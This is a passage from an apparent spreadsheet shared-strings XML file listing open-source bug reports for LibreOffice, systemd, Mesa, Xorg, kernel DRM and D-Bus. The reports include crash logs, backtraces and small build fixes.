  </si>
  <si>
    <t>UI: replace-with pairs are shifted to the left in autocorrect table dialog</t>
  </si>
  <si>
    <t>Created attachment 94103
autocorrect dialog
When opening the Spreadsheet autocorrect dialog (Tools/AutoCorrect options...) the replace-with pairs are shifted to the left it can be seen only from the 3rd character of the with element. 
See attached screenshot.</t>
  </si>
  <si>
    <t>rekaszabo</t>
  </si>
  <si>
    <t>LIBREOFFICE-58149</t>
  </si>
  <si>
    <t>FILEOPEN: HYPERLINK formula functions set wrong URL upon loading</t>
  </si>
  <si>
    <t>Since we now cache formula results in 4.0 and later formula cells with HYPERLINK function don't work properly unless the cells get re-calculated.
To reproduce set in a cell
=HYPERLINK(http://google.com Google!)
This shows Google! in that cell and when you click on it the browser gets launched and you go to Google website.
Now save that file and reload and click that cell again.  Now you get an error dialog indicating that Google! is not a valid URL etc.
This is due to the fact that HYPERLINK relies on the formula cell to contain formula tokens which it doesn't right after load because we cache the result.
Operating System: All
Last worked in: 3.6.4.3 release</t>
  </si>
  <si>
    <t>SYSTEMD-68878</t>
  </si>
  <si>
    <t>systemd does not execute multiple ExecStart after a daemon-reload</t>
  </si>
  <si>
    <t>/lib/systemd/system/systemd-udev-trigger.service contains multiple ExecStart
ExecStart=/usr/bin/udevadm trigger --type=subsystems --action=add  /usr/bin/udevadm trigger --type=devices --action=add
If after the first ExecStart systemd is interrupted with a daemon-reload the other ExecStart parts are never executed.
[    4.474521] cnyk systemd[1]: About to execute: /usr/bin/udevadm trigger --type=subsystems --action=add
[    4.474615] cnyk systemd[1]: Forked /usr/bin/udevadm as 231
[    4.474695] cnyk systemd[1]: systemd-udev-trigger.service changed dead -&gt; start
[    4.474712] cnyk systemd[1]: Expecting device dev-disk-by\x2duuid-400cb83b\x2d3fad\x2d46bc\x2da71b\x2d0e34a4cfa373.device...
[    4.474984] cnyk systemd[231]: Executing: /usr/bin/udevadm trigger --type=subsystems --action=add
[    4.475882] cnyk systemd[1]: Expecting device dev-disk-by\x2duuid-5f5e62a5\x2d3143\x2d4bcf\x2d9d38\x2d968791cd4e16.device...
[    4.477043] cnyk systemd[1]: Expecting device dev-disk-by\x2duuid-67040d2c\x2d2f85\x2d42f8\x2dafb8\x2de667d90f09da.device...
[    4.478198] cnyk systemd[1]: Set up jobs progress timerfd.
[    4.478202] cnyk systemd[1]: Set up idle_pipe watch.
[    4.479278] cnyk systemd[1]: Received SIGHUP from PID 1 (systemd).
[    4.479287] cnyk systemd[1]: Received SIGCHLD from PID 215 (n/a).
[    4.479293] cnyk systemd[1]: Reloading.
...
[    5.694420] cnyk systemd[1]: Received SIGCHLD from PID 231 (udevadm).
[    5.694449] cnyk systemd[1]: Got SIGCHLD for process 231 (udevadm)
[    5.694485] cnyk systemd[1]: Child 231 died (code=exited status=0/SUCCESS)
[    5.694488] cnyk systemd[1]: Child 231 belongs to systemd-udev-trigger.service
[    5.694499] cnyk systemd[1]: systemd-udev-trigger.service: main process exited code=exited status=0/SUCCESS
[    5.694579] cnyk systemd[1]: systemd-udev-trigger.service changed start -&gt; exited
[    5.694584] cnyk systemd[1]: Job systemd-udev-trigger.service/start finished result=done
[    5.694616] cnyk systemd[1]: Started udev Coldplug all Devices.</t>
  </si>
  <si>
    <t>MESA-16831</t>
  </si>
  <si>
    <t>swap schedule failed: bad interval on i945</t>
  </si>
  <si>
    <t>Since commit
  97988ccc46c0248177cd71937021ca8cc2a7452b 
  intel: fix buffer swaps and enable page flipping on 965
mesa floods the console with the following warning:
  swap schedule failed: bad interval
  schedule swap failed trying to wait manually
Could they be debug messages that were not supposed to be committed? Because DRI_CONF_VBLANK_DEF_INTERVAL_0 seems to be the default configuration (at least according to xdriinfo) so the flood is bound to occur if I understand the code correctly.</t>
  </si>
  <si>
    <t>LIBREOFFICE-79392</t>
  </si>
  <si>
    <t>EDITING: Calc crashes when deleting rows in .CSV file</t>
  </si>
  <si>
    <t>Windows7-Ultimate 64bit LibO 4.2.4.2 release
Workflow to reproduce:
1. Open .csv file (from attachment)
2. position cursor on any NON_EMPTY row (e.g. row 4) and select whole row
3. select whole of spreadsheet including and below selected row by pressing CTRL-SHIFT plus cursor-down
4. delete selected part of sheet by pressing CTRL plus -
--&gt; crash with error message: Fatal Error block position not found
br WM
PS: minmum version to reproduce:
1. create new spreadsheet
2. enter at least 2 cells of data (into cells A1 and A2)
3. position on row header of row 2 (selecting whole row)
4. press CTRL-Shift + cursor down (selects whole sheet starting from row 2)
5. press ctrl+- to delete
--&gt; crash</t>
  </si>
  <si>
    <t>w.muellner</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-7347</t>
  </si>
  <si>
    <t>xkb model evdev does not support pc105 geometry</t>
  </si>
  <si>
    <t>I own a french pc105 keyboard and recently tried to use it with the evdev
driver. I set the xkb model to be evdev and the layout to fr but I found out
that the 105th key was missing : [&lt;]. Thus the pc105 geometry couldn't be set
even though the symbols were set at pc(pc105)+fr.
I have a (trivial) patch for this.
With it it works perfectly. Since the 94 keycode is not already defined in the
evdev model there is no conflict so I guess it is safe to just add it.</t>
  </si>
  <si>
    <t>dualmoo</t>
  </si>
  <si>
    <t>DRI-20961</t>
  </si>
  <si>
    <t>libdrm_intel segfault on Firefox load</t>
  </si>
  <si>
    <t>On vanilla linux-2.6.29 with xorg-server 1.5.3 and latest git libdrm and xf86-video-intel I get the following SIGSEGV when loading firefox:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0x7ffe1917a6f0 (LWP 8017)]
drm_intel_gem_bo_unreference_locked (bo=0x3db4490) at intel_bufmgr_gem.c:585
585                 DRMLISTADDTAIL(
(gdb) bt
#0  drm_intel_gem_bo_unreference_locked (bo=0x3db4490)
    at intel_bufmgr_gem.c:585
#1  0x00007ffe15c3439c in drm_intel_gem_bo_unreference (bo=0x3db4490)
    at intel_bufmgr_gem.c:599
#2  0x00007ffe15e87952 in i830_uxa_destroy_pixmap (pixmap=0x3c7a350)
    at i830_exa.c:1011
#3  0x000000000050e0ac in ?? ()
#4  0x00007ffe16b9190f in ?? ()
   from /usr/lib/xorg/modules/extensions//libextmod.so
#5  0x0000000000430ae3 in FreeResource ()
#6  0x0000000000441e03 in ProcFreePixmap ()
#7  0x0000000000445ee9 in Dispatch ()
#8  0x000000000042f095 in main ()
This only happens when KMS is enabled this might be related to bug 20633.
Running a Dell Latitude D630N with lspci reporting:
00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c)</t>
  </si>
  <si>
    <t>reillyeon</t>
  </si>
  <si>
    <t>SPICE-34878</t>
  </si>
  <si>
    <t>linux vdagent: add clipboard selection sharing</t>
  </si>
  <si>
    <t>XORG-1231</t>
  </si>
  <si>
    <t>trivial OpenBSD.cf for amd64 typo</t>
  </si>
  <si>
    <t>When I brought over OpenBSD/amd support I didn't realise that XF86Server was
changed to XorgServer in config files so for OpenBSD/amd64 there's currently
#define XF86Server YES. 
This has the effect of building/install both a XFree86 and a Xorg server. 
Would be nice to commit the fix before the release</t>
  </si>
  <si>
    <t>SYSTEMD-82296</t>
  </si>
  <si>
    <t>sysusers.d/systemd.conf file is having users for disabled ./configure options</t>
  </si>
  <si>
    <t>sysusers.d/systemd.conf is adding users for disabled functionalities. For example if ./configure --disable-networkd is set the user is still added.</t>
  </si>
  <si>
    <t>TELEPATHY-31772</t>
  </si>
  <si>
    <t>Receiving a disco reply from a contact who's gone offline crashes Gabble</t>
  </si>
  <si>
    <t>If Gabble gets a presence with an unknown caps node it sends a disco query.
If the contact then sends an unavailable presence Gabble removes the contact from the presence cache.
But if the pending reply to the disco arrives successfully (which seems improbable until you remember that invisible exists) Gabble crashes because the disco reply code assumes the contact is in the presence cache.
Test case and fix to follow.</t>
  </si>
  <si>
    <t>XORG-9972</t>
  </si>
  <si>
    <t>xorg segfaults with Intel-Modesetting on startup</t>
  </si>
  <si>
    <t>I use xserver[master] and xf86-video-intel[modesetting]. X segfaults at start. xf86-video-intel[master] works fine.</t>
  </si>
  <si>
    <t>hawkes</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-16660</t>
  </si>
  <si>
    <t>tango-icon-library svn repository</t>
  </si>
  <si>
    <t>I would like to request the creation of a tango-icon-library git repository owned by the tango group.
The purpose of the library is to create the 'building blocks' to easily create derivate themes following the tango style gudelines. It is the successor of the tango-icon-theme. More background -- http://lists.freedesktop.org/archives/tango-artists/2008-July/001821.html</t>
  </si>
  <si>
    <t>LIBREOFFICE-47813</t>
  </si>
  <si>
    <t>Wrong alignment of numbers inside math matrices</t>
  </si>
  <si>
    <t>Created attachment 58984
Wrong alignment of numbers inside math matrices
The instructions alignr  alignc and  alignl are no more operational with matrix command. Their consequences are bizarre.
See attachment for exact description and examples.
This bug appeared with version 3.4 and is still present in 3.5.1.2.
(The 3.3 version does not have this bug.)
The same bug appears with Open Office new versions...
Tested on Mac OS X 10.6.8 (Snow Leopard) and Mac OS X 10.7.3 (Lion).</t>
  </si>
  <si>
    <t>b_r_e_f</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-7980</t>
  </si>
  <si>
    <t>GPG key for ervin account</t>
  </si>
  <si>
    <t>Hi
I'd like my GPG key to be associated to my freedesktop.org account (ervin).
My key ID is 0x8DECC9E2 it should be available from subkeys.pgp.net.
Thanks in advance.</t>
  </si>
  <si>
    <t>ervin</t>
  </si>
  <si>
    <t>MESA-34261</t>
  </si>
  <si>
    <t>Buildsystem disables openvg when disabling gallium egl</t>
  </si>
  <si>
    <t>On Fedora gallium egl is disabled since it breaks wayland AFAIK but that forces openvg to be disabled also. Is there any chance to fix this ? Ie make openvg build even if gallium egl is disabled.</t>
  </si>
  <si>
    <t>LIBREOFFICE-53442</t>
  </si>
  <si>
    <t>VIEWING: Text range annotation limited to a single paragraph</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. Open Writer type some text in two differents paragraphs.
2. Select text range beginning in one paragraph and ending in the other (multiple paragraph text range).
3. Try to add a comment/annotation.
Current behavior:
Text range annotations are limited to a single paragraph at most.
Expected behavior:
It should be possible to add annotation/comment on multiple paragraph text range. According to ODF 1.2 I don't see any technical restriction not to support it. Related bug 38244 doesn't give any information on this limitation but Miklos reports it on his blog (http://vmiklos.hu/blog/lo-sw-comment-range).
Platform (if different from the browser):
Platform : all
Browser: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML like Gecko) Chrome/21.0.1180.75 Safari/537.1</t>
  </si>
  <si>
    <t>DRI-31942</t>
  </si>
  <si>
    <t>G41 KMS display is blurry in console &amp; Xorg</t>
  </si>
  <si>
    <t>Starting with kernel 2.6.37_rc1 I noticed that the display was obviously blurry it looked like I was using a non-native res and the LCD was having to resize/interpolate.  It's blurry as soon as KMS takes over and stays blurry after xorg starts.
I verified via dmesg xrandr xorg logs &amp; the LCD's own OSD that it was indeed using the native mode correctly.  I'm going to see if I can find a camera good enough to see the problem.
I did a git bisect on the kernel and traced it to commit e9e331a8abeece1565d383510ed985945132ffe3</t>
  </si>
  <si>
    <t>bkohler</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-3249</t>
  </si>
  <si>
    <t>Change sandmann's real name</t>
  </si>
  <si>
    <t>Please change my real name from Saren to SÃ¸ren or if o-slash is not
possible Soren</t>
  </si>
  <si>
    <t>PULSEAUDIO-61013</t>
  </si>
  <si>
    <t>Clients hang with latest stable-3.x branch</t>
  </si>
  <si>
    <t>Created attachment 74996
Revert commit e02e290d7c
Using the latest stable-3.x branch clients hang for a while and e.g. paplay times out with the error Failed to drain stream: Timeout. Other clients like mplayer seem to be stuck indefinitely.
I bisected it to commit e02e290d7cccd0cfbc89bacf5c0be7934ee58ece (Call change_cb() only when there's an actual change.). With this reverted it works again. (see attachment)
In the case of paplay it seems to be stuck in the ppoll call from pulse/mainloop.c:862 until it times out and then exits with an error.</t>
  </si>
  <si>
    <t>farbing</t>
  </si>
  <si>
    <t>LIBREOFFICE-52293</t>
  </si>
  <si>
    <t>Spelling error (UI Localization)</t>
  </si>
  <si>
    <t>The documentation in the function wizard for the PROB function says discreet instead of discrete in the en-US version. Pretty sure there's nothing too secret about the calculation...</t>
  </si>
  <si>
    <t>kpengboy</t>
  </si>
  <si>
    <t>FONTCONFIG-93075</t>
  </si>
  <si>
    <t>Possible fix for make check failure on msys/MinGW...</t>
  </si>
  <si>
    <t>Created attachment 120044
patch for test/run-test.sh
make check fail on msys/mingw
=============================================
   fontconfig 2.11.94: test/test-suite.log
=============================================
# TOTAL: 2
# PASS:  0
# SKIP:  0
# XFAIL: 0
# FAIL:  2
# XPASS: 0
# ERROR: 0
.. contents:: :depth: 2
FAIL: run-test
==============
*** Test failed: Basic check
*** output is in 'out' expected output in 'out.expected'
FAIL run-test.sh (exit status: 1)
FAIL: test-bz89617
==================
Fontconfig error: Cannot load default config fileFontconfig error: Cannot load default config fileFAIL test-bz89617.exe (exit status: 1)
Here's why.
All the program in the msys distribution are built against msys-1.0.dll which among other things translate paths between unix and windows style.
That allows the autotool's generated files like configure
to be used to build native windows applications with the mingw compiler.
In fontconfig's test suite the first program that fails is run-test.sh
a shell script that use the pwd command to retrieve
a unix style current working directory which is then used to generate a configuration file for fc-list and fc-scan.
fc-list and fc-scan are native windows program and doesn't know how to handle unix paths.
Fortunately msys's pwd has a special '-W' option which print the path in windows style.
And the $OSTYPE environment variable can be checked to detect when the script is run on msys.
Now for test-bz89617 i would like to fix it too but
but i don't know what is it supposed to test exactly ?
Wouldn't it be better to call FcConfigCreate() instead of FcConfigGetCurrent() ?
int
main (void)
{
    FcConfig *config = FcConfigCreate ()
    if (!FcConfigAppFontAddFile (config SRCDIR /4x6.pcf) ||
	FcConfigAppFontAddFile (config /dev/null))
	return 1
    return 0
}
I tried it and it works but i don't know if it divert from the original goal of the test.
I'm sending a patch for run-test.sh.
If you're happy with it could you please commit it to the future releases?
Thanks
Christian Fafard</t>
  </si>
  <si>
    <t>cfaf</t>
  </si>
  <si>
    <t>LIBREOFFICE-74808</t>
  </si>
  <si>
    <t>FILEOPEN: . xlsx chart displayed incorrectly in LO and correct in MS Excel</t>
  </si>
  <si>
    <t>Created attachment 93801
zip file with the xlsx file containing the chart and two screenshots (Calc and Excel)
Problem description: 
a chart included in an xlsx file that is correctly displayed in Excel is empty in Calc the apparent reason is that the Data range of the chart as interpreted in LO is wrong.
Steps to reproduce:
unfortunately I do not know how the file was generated because I received it (maybe is it related to a bug already reported?) however in Excel I removed everything is not relevant to the buggy behavior so that the attached file is possibly the simplest case to be dealt with.
Note that the file was generated with Excel MS Office Professional Plus 2010 Italian version Win 7 and (wrongly) opened in Calc LibreOffice 4.2.0.4 English version Kubuntu 13.10.
Operating System: Debian
Version: 4.2.0.4 release</t>
  </si>
  <si>
    <t>lucapaolomari</t>
  </si>
  <si>
    <t>XORG-9817</t>
  </si>
  <si>
    <t>xorg crashes while start with aiglx enabled</t>
  </si>
  <si>
    <t>as mentioned in the topic xorg crashes while startup
with following error
(II) Reloading /usr/lib/xorg/modules/libint10.so
(II) I810(0): initializing int10
(WW) I810(0): Bad V_BIOS checksum
(II) I810(0): Primary V_BIOS segment is: 0xc000
(EE) I810(0): vm86() syscall generated signal 4.
(II) I810(0): EAX=0x00004e0f EBX=0x00000000 ECX=0x00000000 EDX=0x00000000
(II) I810(0): ESP=0x00000ffa EBP=0x00000000 ESI=0x00000000 EDI=0x00002000
(II) I810(0): CS=0x0000 SS=0x0100 DS=0x0040 ES=0x0000 FS=0x0000 GS=0x0000
(II) I810(0): EIP=0x000000fc EFLAGS=0x00033606
(II) I810(0): code at 0x000000fc:
 f0 ee ed b3 02 00 00 79 bb 17 02 1c 8b 13 e3 0f
 36 23 ff 3f 03 00 05 79 ef df 1a c6 fc bf f9 ff
(II) stack at 0x00001ffa:
 00 06 00 00 00 32
(II) I810(0): VESA BIOS not detected
(EE) I810(0): VBE initialization failed.
(II) UnloadModule: i810
(II) UnloadModule: int10
(II) UnloadModule: vgahw
(II) Unloading /usr/lib/xorg/modules/libvgahw.so
(II) UnloadModule: vbe
(II) UnloadModule: int10
(II) Unloading /usr/lib/xorg/modules/libint10.so
(EE) Screen(s) found but none have a usable configuration.
Fatal server error:
no screens found</t>
  </si>
  <si>
    <t>natoforce</t>
  </si>
  <si>
    <t>MESA-77742</t>
  </si>
  <si>
    <t>i965: Support instruction compaction on Gen &lt; 6</t>
  </si>
  <si>
    <t>Gen &lt; 6 also supports instruction compaction. The i965 and ILK docs seem to be missing the compaction tables but the GM45 docs do contain them. It seems likely that they're identical.</t>
  </si>
  <si>
    <t>XORG-2205</t>
  </si>
  <si>
    <t>Missing return value</t>
  </si>
  <si>
    <t>Xserver/Xprint/attributs.c:AppendEntry() has no return value in the return.
The attached fix should take care of it. I will commit it to head.
I'm also missing the Xprint server as a component.</t>
  </si>
  <si>
    <t>LIBREOFFICE-72647</t>
  </si>
  <si>
    <t>ACCESSIBILITY: Windows UAA Java Accessibility Bridge can not be enabled for AT support following merge of IA2 bridge</t>
  </si>
  <si>
    <t>With ESC decision to keep the UAA  Java Accessibility API Java Accessibility Bridge while implementing the IAccessible2 native bridge as an experimental feature for 4.2.0.0 now requires more work.
The JAB has can no longer be enabled on LODev 4.2.0 beta1+ builds forward.
Believe results from IA2 a11y related commit for 4.2.0.0beta1+ between Nov 21 and Nov 25th that isn't quite correct:
http://cgit.freedesktop.org/libreoffice/core/log/?h=libreoffice-4-2&amp;qt=range&amp;q=f4ca7b35f580827ad2c69ea6d29f7c9b48ebbac7..12ebbb7e471d851eec940a47e6737c7c89d0f7f8&amp;ofs=50
The result is though that currently for the 4.2.0 RC1 users dependent on Java Access Bridge will not be able to activate it and would have to attempt to activate the IAccessible2 bridge as an experimental feature.
Setting a blocker status accordingly--knock it back to critical if we're content to let the RC1 out without JAB functioning.</t>
  </si>
  <si>
    <t>DRI-99947</t>
  </si>
  <si>
    <t>[BDW] igt_ppgtt_lowlevel GEM_BUG_ON(num_entries &gt; pt-&gt;used_ptes)</t>
  </si>
  <si>
    <t>Created attachment 129902
dmesg
Consistently reproducible when using an increased timeout.
[  135.370764] kernel BUG at drivers/gpu/drm/i915/i915_gem_gtt.c:683!
[  135.370766] invalid opcode: 0000 [#1] SMP
[  135.370766] Modules linked in: i915(+) drm_kms_helper drm rfcomm fuse xt_CHECKSUM ipt_MASQUERADE nf_nat_masquerade_ipv4 tun nf_conntrack_netbios_ns nf_conntrack_broadcast xt_CT ip6t_rpfilter ip6t_REJECT nf_reject_ipv6 xt_conntrack ip_set nfnetlink ebtable_nat ebtable_broute bridge stp llc ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_security ip6table_raw ip6table_mangle iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat libcrc32c nf_conntrack iptable_security iptable_raw iptable_mangle ebtable_filter ebtables ip6table_filter ip6_tables cmac bnep arc4 iwlmvm intel_rapl mac80211 x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm iwlwifi mei_wdt iTCO_wdt iTCO_vendor_support irqbypass intel_cstate btusb snd_hda_codec_realtek snd_hda_codec_hdmi intel_uncore
[  135.370792]  snd_hda_codec_generic btrtl cfg80211 btbcm btintel snd_hda_codec intel_rapl_perf bluetooth snd_hwdep snd_hda_core i2c_i801 intel_pch_thermal snd_seq joydev rtsx_pci_ms snd_seq_device memstick mei_me nfsd mei snd_pcm shpchp lpc_ich thinkpad_acpi wmi auth_rpcgss snd_timer snd rfkill tpm_tis tpm_tis_core intel_rst soundcore tpm nfs_acl lockd grace sunrpc binfmt_misc dm_crypt hid_logitech_hidpp hid_logitech_dj hid_microsoft prime_numbers i2c_algo_bit rtsx_pci_sdmmc mmc_core e1000e crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel ptp rtsx_pci pps_core serio_raw fjes video [last unloaded: drm]
[  135.370817] CPU: 1 PID: 2921 Comm: drv_selftest Tainted: G     U          4.10.0-debug+ #251
[  135.370818] Hardware name: LENOVO 20BW000FUK/20BW000FUK BIOS JBET54WW (1.19 ) 11/06/2015
[  135.370820] task: ffff8ed6ee6bd7c0 task.stack: ffffae104194c000
[  135.370867] RIP: 0010:gen8_ppgtt_clear_pd+0x19a/0x250 [i915]
[  135.370868] RSP: 0000:ffffae104194f860 EFLAGS: 00010287
[  135.370870] RAX: 0000000000000000 RBX: 000003147c800000 RCX: 0000000000800000
[  135.370871] RDX: 0000000000000200 RSI: ffff8ed4cb778000 RDI: 0000000000000200
[  135.370872] RBP: ffffae104194f8a0 R08: ffff8ed6e93a2000 R09: ffff8ed6ee6bd7c0
[  135.370872] R10: ffff8ed6629f8ba0 R11: 0000000000000000 R12: ffff8ed6ee6bd7c0
[  135.370873] R13: 0000000000800000 R14: 00000000000001e4 R15: ffff8ed4cb778000
[  135.370875] FS:  00007f71799a9dc0(0000) GS:ffff8ed6fd840000(0000) knlGS:0000000000000000
[  135.370876] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  135.370876] CR2: 00007fa92a7e701d CR3: 000000022d992000 CR4: 00000000003406e0
[  135.370878] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  135.370878] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  135.370879] Call Trace:
[  135.370918]  gen8_ppgtt_clear_pdp+0x97/0xf0 [i915]
[  135.370953]  gen8_ppgtt_clear_4lvl+0xa4/0xe0 [i915]
[  135.370987]  lowlevel_hole+0x431/0x4f0 [i915]
[  135.371021]  exercise_ppgtt+0xac/0x110 [i915]
[  135.371054]  ? pot_hole+0x300/0x300 [i915]
[  135.371086]  igt_ppgtt_lowlevel+0x15/0x20 [i915]
[  135.371127]  __i915_subtests+0x3c/0xc0 [i915]
[  135.371160]  i915_gem_gtt_live_selftests+0x2f/0x40 [i915]
[  135.371197]  __run_selftests+0x113/0x1c0 [i915]
[  135.371233]  i915_live_selftests+0x35/0x60 [i915]
[  135.371266]  i915_pci_probe+0x67/0xb0 [i915]
[  135.371269]  local_pci_probe+0x45/0xa0
[  135.371271]  pci_device_probe+0x103/0x150
[  135.371273]  driver_probe_device+0x2bb/0x460
[  135.371275]  __driver_attach+0xdf/0xf0
[  135.371277]  ? driver_probe_device+0x460/0x460
[  135.371278]  bus_for_each_dev+0x6c/0xc0
[  135.371279]  driver_attach+0x1e/0x20
[  135.371281]  bus_add_driver+0x170/0x270
[  135.371282]  driver_register+0x60/0xe0
[  135.371284]  __pci_register_driver+0x4c/0x50
[  135.371316]  i915_init+0x6f/0x78 [i915]
[  135.371317]  ? 0xffffffffc0488000
[  135.371319]  do_one_initcall+0x52/0x1a0
[  135.371322]  ? __vunmap+0x81/0xd0
[  135.371324]  ? kmem_cache_alloc_trace+0x167/0x1c0
[  135.371326]  ? do_init_module+0x27/0x1f8
[  135.371328]  do_init_module+0x5f/0x1f8
[  135.371330]  load_module+0x25d7/0x29b0
[  135.371332]  ? __symbol_put+0x70/0x70
[  135.371333]  ? vfs_read+0x11b/0x130
[  135.371335]  SYSC_finit_module+0xdf/0x110
[  135.371337]  SyS_finit_module+0xe/0x10
[  135.371340]  entry_SYSCALL_64_fastpath+0x1a/0xa9
[  135.371341] RIP: 0033:0x7f71781debf9
[  135.371341] RSP: 002b:00007ffdef4d23d8 EFLAGS: 00000246 ORIG_RAX: 0000000000000139
[  135.371343] RAX: ffffffffffffffda RBX: 0000000000000008 RCX: 00007f71781debf9
[  135.371343] RDX: 0000000000000000 RSI: 00000000015e3740 RDI: 0000000000000008
[  135.371344] RBP: 0000000000000005 R08: 0000000000000000 R09: 0000000000000000
[  135.371345] R10: 0000000000000008 R11: 0000000000000246 R12: 00007ffdef4d13d0
[  135.371345] R13: 00007ffdef4d13b0 R14: 0000000000000005 R15: 00000000015e9c10
[  135.371346] Code: 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c1 e8 0c 45 8b 5a 10 ba 00 02 00 00 25 ff 01 00 00 29 c2 41 39 d3 8d 3c 10 0f 83 02 ff ff ff  0b 49 8b b0 48 03 00 00 44 89 f2 4c 89 ff 4c 89 4d c0 4c 89 
[  135.371403] RIP: gen8_ppgtt_clear_pd+0x19a/0x250 [i915] RSP: ffffae104194f860</t>
  </si>
  <si>
    <t>SYSTEMD-75461</t>
  </si>
  <si>
    <t>latest git master forcefully suspends my laptop while docked during system boot</t>
  </si>
  <si>
    <t>The latest git mastor of systemd (upcoming version 210) got some changes with regards to the handling of the situation where the lid of the laptop is closed. This however has a nasty side effect as that laptops that are docked have normally their lid closed. 
I already reported this to Lennart and his indication is that this should be fixed in the kernel (setting event SD_DOCK) or by the desktop environment. 
Unfortunately systemd starts already suspending the laptop during the boot process long before I reach the login manager. This means that practically I can no longer boot my laptop while it is docked without opening the lid. As that I have an external monitor this is a bit of a ridiculous situation. 
I already raised a bug for the kernel but I do not expect a fast reply on that nor a fix.  Raising a bug for the desktop environment (as suggested by Lennart) would be strange as that NO desktop environment is running at that time. The only process that is in full control at that moment is systemd (system boot time).</t>
  </si>
  <si>
    <t>tittiatcoke</t>
  </si>
  <si>
    <t>DRI-99524</t>
  </si>
  <si>
    <t>kernel hangs during shutdown (similar to Bug 98200)</t>
  </si>
  <si>
    <t>Created attachment 129131
serial terminal capture (power on login shutdown)
Hi
this bug is similar to Bug 98200.
Since upgrade from kernel 4.8.17 to 4.9.{125} I am unable to restart or shutdown my PC. 
Poweroff/restart always ends with black screen (display shows no signal). 
System stays frozen with fans / hard discs spinning. 
Reset button does not bring the system back - it stays completely frozen.
Only manual (power button) power off/on cycle brings the system back.
GPU: [AMD/ATI] Juniper XT [Radeon HD 5770]
I was able to capture kernel messages over serial line last lines:
...
[  136.326236] systemd-shutdown[1]: All loop devices detached.
[  136.353887] kvm: exiting hardware virtualization
[  136.380090] Console: switching to colour VGA+ 80x25
[  136.406675] [drm] radeon: finishing device.  
I tested kernel 4.9.1 4.9.2 and 4.9.5.</t>
  </si>
  <si>
    <t>10dmar10</t>
  </si>
  <si>
    <t>DBUS-3793</t>
  </si>
  <si>
    <t>dbus-0.34 and glib detection</t>
  </si>
  <si>
    <t>some source files in glib subdirectory include glib/gi18n.h.
glib cvs show taht this file appear for first time in GLIB_2_3_1 tag.
on system glib 2.2.x ./configure script detect it but later make fail in glib
subdirectory.
what about two lines in configure script:
------------------
# Glib detection
PKG_CHECK_MODULES(DBUS_GLIB gobject-2.0 have_glib=yes have_glib=no)
PKG_CHECK_MODULES(DBUS_GLIB_THREADS glib-2.0 gthread-2.0
have_glib_threads=yes have_glib_threads=no)
------------------
to be changed as follow:
------------------
# Glib detection
PKG_CHECK_MODULES(DBUS_GLIB gobject-2.0 &gt;= 2.4 have_glib=yes have_glib=no)
PKG_CHECK_MODULES(DBUS_GLIB_THREADS gthread-2.0 &gt;= 2.4 have_glib_threads=yes
have_glib_threads=no)
------------------
note gthread-2.0 require glib-2.0 and we can exclude 'glib-2.0' from second check.
What about warning/error message:
{...}GLib development libraries not found
to be changed to:
{...}GLib&gt;=2.4 development package not found</t>
  </si>
  <si>
    <t>bugtrack</t>
  </si>
  <si>
    <t>LIBREOFFICE-70468</t>
  </si>
  <si>
    <t>TDF Site: Update portable release 4.1.2</t>
  </si>
  <si>
    <t>Please
Update TDF site LibreOffice Portable 4.1.2
http://www.libreoffice.org/download/portable/</t>
  </si>
  <si>
    <t>XORG-11933</t>
  </si>
  <si>
    <t>Geode LX700 doesn't work with VESA driver</t>
  </si>
  <si>
    <t>I have a Koolu system with an AMD Geode LX 700.
On Slackware 12.0 (xorg-server-1.3.0.0) using the VESA driver X doesn't start. On Ubuntu (X 7.2.0) the vesa driver seems to work fine.
Attached are the logs from both OS's. These are the last lines from the Slackware log:
(II) VESA(0): VBESetVBEMode failedc000:0282: A2 ILLEGAL EXTENDED X86 OPCODE!
(EE) VESA(0): Set VBE Mode failed!
I'm willing to do some work to help figure this out. Also if someone can suggest a temporary solution (I need X to configure CUPS) that would be appreciated.</t>
  </si>
  <si>
    <t>asmith15</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-90849</t>
  </si>
  <si>
    <t>Access request</t>
  </si>
  <si>
    <t>Created attachment 116291
ssh key
Have fixes to push.</t>
  </si>
  <si>
    <t>sstutsma</t>
  </si>
  <si>
    <t>DBUS-15733</t>
  </si>
  <si>
    <t>redundant declarations in dbus-gtype-specialized.h</t>
  </si>
  <si>
    <t>dbus_g_type_map_peek_vtable and dbus_g_type_collection_peek_vtable are declared twice.</t>
  </si>
  <si>
    <t>jylefort</t>
  </si>
  <si>
    <t>TELEPATHY-26110</t>
  </si>
  <si>
    <t>Implement EnsureChannel for Call channels.</t>
  </si>
  <si>
    <t>TELEPATHY-24654</t>
  </si>
  <si>
    <t>_tp_account_check_features can use uninitialized variables</t>
  </si>
  <si>
    <t>Daf pasted:
==26952== Conditional jump or move depends on uninitialised value(s)
==26952==    at 0x42F1B2E: _tp_account_check_features (account.c:257)
==26952==    by 0x42F21D0: _tp_account_update (account.c:307)
==26952==    by 0x43736A8: _tp_cli_dbus_properties_invoke_callback_get_all (tp-cli-generic-body.h:1421)
==26952==    by 0x4375E66: tp_proxy_pending_call_idle_invoke (proxy-methods.c:153)
==26952==    by 0x5C330B0: g_idle_dispatch (gmain.c:4065)
==26952==    by 0x5C34E97: g_main_context_dispatch (gmain.c:1960)
==26952==    by 0x5C38622: g_main_context_iterate (gmain.c:2591)
==26952==    by 0x5C38AE9: g_main_loop_run (gmain.c:2799)
==26952==    by 0x55D1ED8: gtk_main (gtkmain.c:1216)
==26952==    by 0x8066D36: main (empathy.c:1002)
==26952== 
==26952== Conditional jump or move depends on uninitialised value(s)
